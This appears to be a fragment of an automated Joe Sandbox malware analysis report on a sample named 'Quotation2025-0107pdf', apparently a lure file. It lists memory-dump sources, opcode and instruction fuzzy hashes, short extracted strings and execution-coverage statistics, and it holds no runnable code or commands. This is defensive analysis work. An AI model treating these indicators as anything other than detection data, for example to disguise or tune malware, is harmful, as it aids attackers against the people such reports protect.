                                                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction Fuzzy Hash: 0F11BB75504284CFDB12DF58D5C4B15BBA2FB84324F24C6AAD94A4B696C33AD40BCBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                      • API String ID: 0-1677660839
                                                                                      • Opcode ID: f6cc4949f81c8bab550794a18baa5eb32e3756bdc72083835d5e3b4b53d06133
                                                                                      • Instruction ID: 19b6307a0e4a70a1fced9cd6efc2e2cdf7ecbbae07499ef40e63d565c22c6452
                                                                                      • Opcode Fuzzy Hash: f6cc4949f81c8bab550794a18baa5eb32e3756bdc72083835d5e3b4b53d06133
                                                                                      • Instruction Fuzzy Hash: D1326F70E002588FDB54EF78C8907AEBBF2BF84300F258569D489AB399DB349D45CB95
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TJcq$Te^q$xbaq
                                                                                      • API String ID: 0-3225726259
                                                                                      • Opcode ID: 1a3498496ec72d24960dd959c5c4382d70990dda8b9514ff0d0493fa971fe3bf
                                                                                      • Instruction ID: 57b32da62f1caf07531181050dd05d11f87a8bffec8e4e7f381d2dee0c5eec6c
                                                                                      • Opcode Fuzzy Hash: 1a3498496ec72d24960dd959c5c4382d70990dda8b9514ff0d0493fa971fe3bf
                                                                                      • Instruction Fuzzy Hash: FBC16375E006688FDB68DF6AC9446DDBBF2BF88301F14C1AAD409AB365DB305A85CF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -=J$2ii@$nM$s
                                                                                      • API String ID: 0-2111338200
                                                                                      • Opcode ID: 60cbaa1cbfe5c03d6c2218cbba6ee221c61b9afd37bfdb7af969a3bd1f2bfbae
                                                                                      • Instruction ID: ba81dce0cfb6816f1659ef7572db5dbb5048300acd9178fac9a3c02dabf68198
                                                                                      • Opcode Fuzzy Hash: 60cbaa1cbfe5c03d6c2218cbba6ee221c61b9afd37bfdb7af969a3bd1f2bfbae
                                                                                      • Instruction Fuzzy Hash: 2F411AB4E0520EDBCF04CFA9C5845AEFBB2AF89300F24D56AC415EB214E734AB41CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -=J$2ii@$nM$s
                                                                                      • API String ID: 0-2111338200
                                                                                      • Opcode ID: e975ff48ad0aba9f9f7784d60690d62bf1c98bc1bf03ae101d6c1123ed93f216
                                                                                      • Instruction ID: c81731443f1ecfe4acf6a560f590847e4c56ca39b1471f67030065bed9c4355b
                                                                                      • Opcode Fuzzy Hash: e975ff48ad0aba9f9f7784d60690d62bf1c98bc1bf03ae101d6c1123ed93f216
                                                                                      • Instruction Fuzzy Hash: 9441F7B4E0520EDBCF04CFA9C5845AEFBB2AF88300F24D569C515F7214E734AA428F94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: b[$b[
                                                                                      • API String ID: 0-2917807350
                                                                                      • Opcode ID: af2e370096e6eef6f97163b968d11b1bb12c88da451a8d8a719d57dddcc2fc6c
                                                                                      • Instruction ID: 370a3037e0cdabba737668751b934b106a06d17c97284442f56f6f3da13ab23a
                                                                                      • Opcode Fuzzy Hash: af2e370096e6eef6f97163b968d11b1bb12c88da451a8d8a719d57dddcc2fc6c
                                                                                      • Instruction Fuzzy Hash: E2B1FF74E1121ACFDB44DFA8D884ADEBBB2FF88301F108659D419AB359DB34A945CF90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'^q
                                                                                      • API String ID: 0-1614139903
                                                                                      • Opcode ID: 66478b753e3d8aac74c1db2bedee00ed6f5f73091a7201516669c1c548acedbd
                                                                                      • Instruction ID: 46978f09ad8141fc0b4b102d57cad8d1cce3c906ba6de33779e0a82b7f9f755f
                                                                                      • Opcode Fuzzy Hash: 66478b753e3d8aac74c1db2bedee00ed6f5f73091a7201516669c1c548acedbd
                                                                                      • Instruction Fuzzy Hash: A77118B1E042598FDB58DF6EE8406AABBF2FB98300F04C469D0099B264EB345907CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'^q
                                                                                      • API String ID: 0-1614139903
                                                                                      • Opcode ID: d6ee26970437c0d072c979f536e075df5f696b20193c48bc70b328428b03b8b2
                                                                                      • Instruction ID: e0aa46d67eee575626a33d6d0af715508b28306eddd16eb852d82f3c3dcc25e2
                                                                                      • Opcode Fuzzy Hash: d6ee26970437c0d072c979f536e075df5f696b20193c48bc70b328428b03b8b2
                                                                                      • Instruction Fuzzy Hash: EA611BB1E042598FDB58DF7EE8406AABBF6FB98300F04C569D0099B264EB745907CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5N9!
                                                                                      • API String ID: 0-3730369185
                                                                                      • Opcode ID: 9160fce5fc68a446a8eebd8f816a48e2aff961ff046a9498b5b2e57ec342cde6
                                                                                      • Instruction ID: 6c8c2cb5541be7b0fbb8776b53868441d3a6c78748f3d2dd1bd520ddb3b88a27
                                                                                      • Opcode Fuzzy Hash: 9160fce5fc68a446a8eebd8f816a48e2aff961ff046a9498b5b2e57ec342cde6
                                                                                      • Instruction Fuzzy Hash: 6B4119B4E0560ADFCF04CFAAC5415AEFBF2EB89304F24D46AC416E7254E734AA418F94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: kK)R
                                                                                      • API String ID: 0-1888444940
                                                                                      • Opcode ID: 1ce7760262b6977dce343ed821eb74cc8cbe9a883d5d356278917b99747017a0
                                                                                      • Instruction ID: 860692db4f5b90b4821aa0a8b13e2fb61fc9714b8c97292a979d2395d1dfa8e8
                                                                                      • Opcode Fuzzy Hash: 1ce7760262b6977dce343ed821eb74cc8cbe9a883d5d356278917b99747017a0
                                                                                      • Instruction Fuzzy Hash: CE411374E0961A9FCB04CFA9C8409AEFBF1BF89320F14D56AD815E7364D7309A52CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5N9!
                                                                                      • API String ID: 0-3730369185
                                                                                      • Opcode ID: 18761265d8375420bc782aab365fd66230f9ea89d1c026db923800d679bc7b91
                                                                                      • Instruction ID: 59cce7d5a8778b89173643216884b2a00b27f90e3645d59c62f1cbbc5951a0ec
                                                                                      • Opcode Fuzzy Hash: 18761265d8375420bc782aab365fd66230f9ea89d1c026db923800d679bc7b91
                                                                                      • Instruction Fuzzy Hash: BF41D7B4E0460ADFCF04CFAAD5415AEFBF2BB88304F24D46AD515E7214D734AA418F94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 509c6ca2b441653189676f0884009970a261ee209c376ae5706d83b35c78b164
                                                                                      • Instruction ID: 9624ebc9e0aff12bd6eb8cfcbc41bb458195672013eb8eb7901d827f4e8d80fe
                                                                                      • Opcode Fuzzy Hash: 509c6ca2b441653189676f0884009970a261ee209c376ae5706d83b35c78b164
                                                                                      • Instruction Fuzzy Hash: 5812E2F14127468BEB28EF25ED4828D3BA5B746328F944209C2A51B2DDD7FD154ACF88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55e35b21e3546c7665a41ab366d1351dca2e12bb40f3e2643bd974629a398e81
                                                                                      • Instruction ID: 06ce9a46013081b46ba50612272acd0816343a5a1e940e1c590df93bec66d3fb
                                                                                      • Opcode Fuzzy Hash: 55e35b21e3546c7665a41ab366d1351dca2e12bb40f3e2643bd974629a398e81
                                                                                      • Instruction Fuzzy Hash: A1E1EAB4E101198FCB14DFA9C5909AEFBB2FF89304F258169D418AB355D731AD82CFA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8a51ee5051a51cd845b769f54ff2ab48abdf0828a0a6bed5100eab4e3a2296f
                                                                                      • Instruction ID: 6406a9567ddd084fea44bc5ad1feb4d433fab51e6cf82274c45cad4f1c0f32bf
                                                                                      • Opcode Fuzzy Hash: b8a51ee5051a51cd845b769f54ff2ab48abdf0828a0a6bed5100eab4e3a2296f
                                                                                      • Instruction Fuzzy Hash: 92E11AB4E141198FCB14DFA9C5909AEFBB2FF89304F248169D414AB755DB30AD82CFA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 849a5e32ca6a3d6675bec6a8ca3047a31ce2343c3811b6f785640b2ddc8d0c62
                                                                                      • Instruction ID: ab2f045db0de4351ca6bfd63fa5550b70520afd49e9cf8ec33ae886eaefc952d
                                                                                      • Opcode Fuzzy Hash: 849a5e32ca6a3d6675bec6a8ca3047a31ce2343c3811b6f785640b2ddc8d0c62
                                                                                      • Instruction Fuzzy Hash: 36E11A74E141198FCB14DFA9C5909AEFBB2FF89304F248169D418AB755DB30AD82CF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be82ed3f8b8ba445ee46bbcd78ba7870349043e3d6af7824254b9ad7b99c14cc
                                                                                      • Instruction ID: e63bd0feab16e5a8d136eb9bbf464c5e2cf7a1e437e987b7cdbd7c77beb69da6
                                                                                      • Opcode Fuzzy Hash: be82ed3f8b8ba445ee46bbcd78ba7870349043e3d6af7824254b9ad7b99c14cc
                                                                                      • Instruction Fuzzy Hash: 96E119B4E141198FCB14DFA9C5909AEFBB2FF89304F248169D418AB755DB30AD82CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f732717bd6bf5d1ebcaca562f783600c9a1240cae8df0cb1f2ba5cb004cd1b8
                                                                                      • Instruction ID: 8569b7560febd9fa4833af85c8d32874b4aff43f7a47de7524777011f46cf054
                                                                                      • Opcode Fuzzy Hash: 3f732717bd6bf5d1ebcaca562f783600c9a1240cae8df0cb1f2ba5cb004cd1b8
                                                                                      • Instruction Fuzzy Hash: F2E10974E102198FCB14DFA9D5909AEFBB2FF89304F258169D418AB355DB30AD82CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 246faceb73172c9b9602e08b5340da267e16025391f0b06abfc126079a56c823
                                                                                      • Instruction ID: 905e2099ef8d31ff8036a41468996d3100bbec48fec10d3ab809b4dd89f9c565
                                                                                      • Opcode Fuzzy Hash: 246faceb73172c9b9602e08b5340da267e16025391f0b06abfc126079a56c823
                                                                                      • Instruction Fuzzy Hash: C3C16FB0E002199FCB55EF65C88079DBBF2BF84300F15C1AAD489AB259DB70D985CF95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a57981d465422721cca3c486791650ba81912bab41e700ad0a1b384f800a699f
                                                                                      • Instruction ID: fb29389d415c457afd83d722cf38f0ca46a558afd6d74008e2c7b08aa8635492
                                                                                      • Opcode Fuzzy Hash: a57981d465422721cca3c486791650ba81912bab41e700ad0a1b384f800a699f
                                                                                      • Instruction Fuzzy Hash: 3AA17C76B01219CFCF06DFA4C8405EEB7F6FF85300B15466AE805AB225DB35E946CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 426a40cc216376d2de1db241248dcc21764ba2ec3272a78b21d3cd9c41b2f705
                                                                                      • Instruction ID: 595d1656b01b3b1cdd63b90ba8949e41a0052887621109429e19c92dc52375bb
                                                                                      • Opcode Fuzzy Hash: 426a40cc216376d2de1db241248dcc21764ba2ec3272a78b21d3cd9c41b2f705
                                                                                      • Instruction Fuzzy Hash: 0F910971E106198FDB54DF69C88069DF7F1BF88304F2482AAE459EB351EB71A981CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b2f189a22a7a847139be0036f5402db6572294a8771cdb870ad9ed7086fe62b
                                                                                      • Instruction ID: 94f14f6ff0f24ef7c10a1c13385994ad342c5a05273e1403a05938dabd57166e
                                                                                      • Opcode Fuzzy Hash: 1b2f189a22a7a847139be0036f5402db6572294a8771cdb870ad9ed7086fe62b
                                                                                      • Instruction Fuzzy Hash: 98912B71E106198FCB54DF68C880A9DF7F1BF89304F2482AAE459EB351EB31A981CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c76f41922d9b2a42b71685e845a9e5740d7760810347fae9892b38f8b2bc15d3
                                                                                      • Instruction ID: fcfcfa73b0cf9374bba55bbec994d685a801c50298959a98f42e5dd37518104b
                                                                                      • Opcode Fuzzy Hash: c76f41922d9b2a42b71685e845a9e5740d7760810347fae9892b38f8b2bc15d3
                                                                                      • Instruction Fuzzy Hash: F1812370E152098FCF04CFA9D5804DEFBF2BF8A760F24946AD045FB224D734AA068B25
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35f6a0c6b10fa33b50dde29576754ab1221aedcd16df3b632165381416fd018e
                                                                                      • Instruction ID: 7cd53edace3c8880397f61b11ee03609394075ec3552c77fa53a8162015e4221
                                                                                      • Opcode Fuzzy Hash: 35f6a0c6b10fa33b50dde29576754ab1221aedcd16df3b632165381416fd018e
                                                                                      • Instruction Fuzzy Hash: E36108B4D15209DFDB28CFA9D444AEEBBBAFF4A300F109029E419B7255D734994ACF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 485b462c597ef9a66b1e7ec9ada58ac59c63c713f0d3dc104b495175e3ccfdac
                                                                                      • Instruction ID: ca9a7c6442a87fb059b39d1a3ea3e4db5d951c3bebddfa401c3726c5f526f8fe
                                                                                      • Opcode Fuzzy Hash: 485b462c597ef9a66b1e7ec9ada58ac59c63c713f0d3dc104b495175e3ccfdac
                                                                                      • Instruction Fuzzy Hash: F7711374E152098FCF04CFA9D5805DEFBF2BF89760F24A46AD045FB224D734AA428B65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0449c4fc271ce008edca14f130bd52ce1be6b49973f719ac10d6155fff7dd51d
                                                                                      • Instruction ID: 075424547368e64c84222f195b220248d277767ee30ee460d29ea38987855acb
                                                                                      • Opcode Fuzzy Hash: 0449c4fc271ce008edca14f130bd52ce1be6b49973f719ac10d6155fff7dd51d
                                                                                      • Instruction Fuzzy Hash: A0612A74E052299FDB14CFA9D980AAEFBB2FB89300F24C16AD509E7355D7309A41CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5f0ddaa53ffa61744faad66e88f805d819a728fd6b7d2e09f02d8a52b25b1c6a
                                                                                      • Instruction ID: 3b427f606612ac874959a16f8eccf9ab701b3695ad2f4332d7944278721c86c3
                                                                                      • Opcode Fuzzy Hash: 5f0ddaa53ffa61744faad66e88f805d819a728fd6b7d2e09f02d8a52b25b1c6a
                                                                                      • Instruction Fuzzy Hash: 45513A70E142598FCB15CFA9C9905EEBBF2BF89304F2581AAD458AB316D7309D42CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d45d12afa89be168ac410b2204bebf16f255fdece08c94afbe93de3810116bc1
                                                                                      • Instruction ID: f80334e9c74d694283e048ba62a03fa8c4b9bb825686410cb48c122e1981bae3
                                                                                      • Opcode Fuzzy Hash: d45d12afa89be168ac410b2204bebf16f255fdece08c94afbe93de3810116bc1
                                                                                      • Instruction Fuzzy Hash: 96611970E152299BDB14CF69D980AAEFBB2FF89300F24C16AD509E7355D7309A41CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca4341b972123e3355a29b43a87ee1891eea03ec024f91e5630835f4c148f7b7
                                                                                      • Instruction ID: ce0d35a59dcf7d6bdf0f6687c7b7abe4187b375796450a89d6c6eed0f12f062d
                                                                                      • Opcode Fuzzy Hash: ca4341b972123e3355a29b43a87ee1891eea03ec024f91e5630835f4c148f7b7
                                                                                      • Instruction Fuzzy Hash: 5C415E71E116588BEB28CF6B894479EFBF3AFC9300F14C1BA954CA6225DB305A458F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe32c4dbe1b744b7dc534286e0df8c5ff3acd8ecd2442b205eef0814faaa338a
                                                                                      • Instruction ID: 61e45ff31e5400553f510eeaec4e59714ba7fa2dc06d1987af82606e14626dd3
                                                                                      • Opcode Fuzzy Hash: fe32c4dbe1b744b7dc534286e0df8c5ff3acd8ecd2442b205eef0814faaa338a
                                                                                      • Instruction Fuzzy Hash: 1F31BAB5D012089FCB14CFA9D984A9EFBF1AB49310F24902AE808B7210D734A945CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6369ed4bd208ca2f15d2b17c21b61579ed54189563bb1cfd72140926c703555a
                                                                                      • Instruction ID: 34df37d2073126b4c16abd90728b0d0d4712614cb37f5c87fcf5032265e6a803
                                                                                      • Opcode Fuzzy Hash: 6369ed4bd208ca2f15d2b17c21b61579ed54189563bb1cfd72140926c703555a
                                                                                      • Instruction Fuzzy Hash: 153199B4D052589FCB14DFA9E984ADEFBF1EB49310F24902AE808B7310D774A945CF94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cccebea8eba271d191bbd618487bc43f494caaca95dfadaa3508c1c41890906c
                                                                                      • Instruction ID: 88730276e9854134edc84713b1d972fd2a42144882240f2887e7f804535ee737
                                                                                      • Opcode Fuzzy Hash: cccebea8eba271d191bbd618487bc43f494caaca95dfadaa3508c1c41890906c
                                                                                      • Instruction Fuzzy Hash: 892128B0E11219DBDB18DFAAD8417AEFBB7ABC8714F14C0AAD508A7254DB308A418F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27a1bd8830f1409f86d7ee051142056f29d302dd0e74309c529dc300b97facd2
                                                                                      • Instruction ID: 84f7dafe86904e5bc661d070ede02762f56cb68c18d09781a152e6f18c6c0a55
                                                                                      • Opcode Fuzzy Hash: 27a1bd8830f1409f86d7ee051142056f29d302dd0e74309c529dc300b97facd2
                                                                                      • Instruction Fuzzy Hash: FE213D70E112599BDB18CF6BD8406AEFBF3AFC9704F14C4AAD908E7354DB314A458B51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e22f265c8da80eea603ac24e2698aeef946bb2e2f1a3804a0d23af72b247c01d
                                                                                      • Instruction ID: 63ddde0bcdbffbfa7cca2c86c95dbfb96c0f73402b98e615d832abe512efb107
                                                                                      • Opcode Fuzzy Hash: e22f265c8da80eea603ac24e2698aeef946bb2e2f1a3804a0d23af72b247c01d
                                                                                      • Instruction Fuzzy Hash: DE21ED71E056189BEB18CF6B98447DEFBF3AFC8314F08C17AD908A6224EB3546568F51

                                                                                      Execution Graph

                                                                                      Execution Coverage:14.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:261
                                                                                      Total number of Limit Nodes:21
